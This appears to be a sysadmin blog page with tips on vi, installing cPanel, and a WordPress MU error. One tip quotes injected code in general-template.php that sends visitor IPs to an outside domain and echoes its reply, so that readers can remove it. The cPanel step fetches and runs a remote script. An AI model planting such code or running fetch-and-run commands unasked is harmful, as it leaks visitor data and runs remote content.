Skip to main content

Posts

:: how to delete empty line in vi ::

:: lets do it <esc>:g/^$/d <esc> is esc key on the keyboard :: delete some of those lines in vi <esc>:g/^ *$/d there is a space after the '^' and before the '*' :: links + googlelinux + sysunconfig Related articles by Zemanta Emacs v. vi is rooted in the love of Lisp (stevengharms.com) deleting files and folders in user areas via script (edugeek.net) VI Editor / Linux Terminal Cheat Sheet (PDF) (smashingmagazine.com)

:: install cpanel on centos ::

:: what is please take a look this. :: install cpanel on linux [ linux: ~ ]# yum install perl wget [ linux: ~ ]# wget layer1.cpanel.net/latest [ linux: ~ ]# sh latest thats it once it is done installing, assuming you have a license, you can access whm and start to configure it. :: links + googlelinux + cpanel

:: error bandwidth limit on wordpress mu ::

:: error on wordpress mu Bandwidth Limit Exceeded The server is temporarily unable to service your request due to the site owner reaching his/her bandwidth limit. Please try again later. Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8n DAV/2 mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 Server at 24365online.com Port 80 you got that error but your hosting did not limited of bandwidth.. and you get 24365online.com error but you didn't use that service site.. :: how to fix that wp mu error edit general-template.php file on wp-included directory, then remove this line : $url = “http://24365online.com/_YTG_yu/_dl/get_info.php?host=$host&referer=$referer&visitor_ip=$visitor_ip”; $content = file_get_contents($url); echo $content; :: links + googlelinux + muforum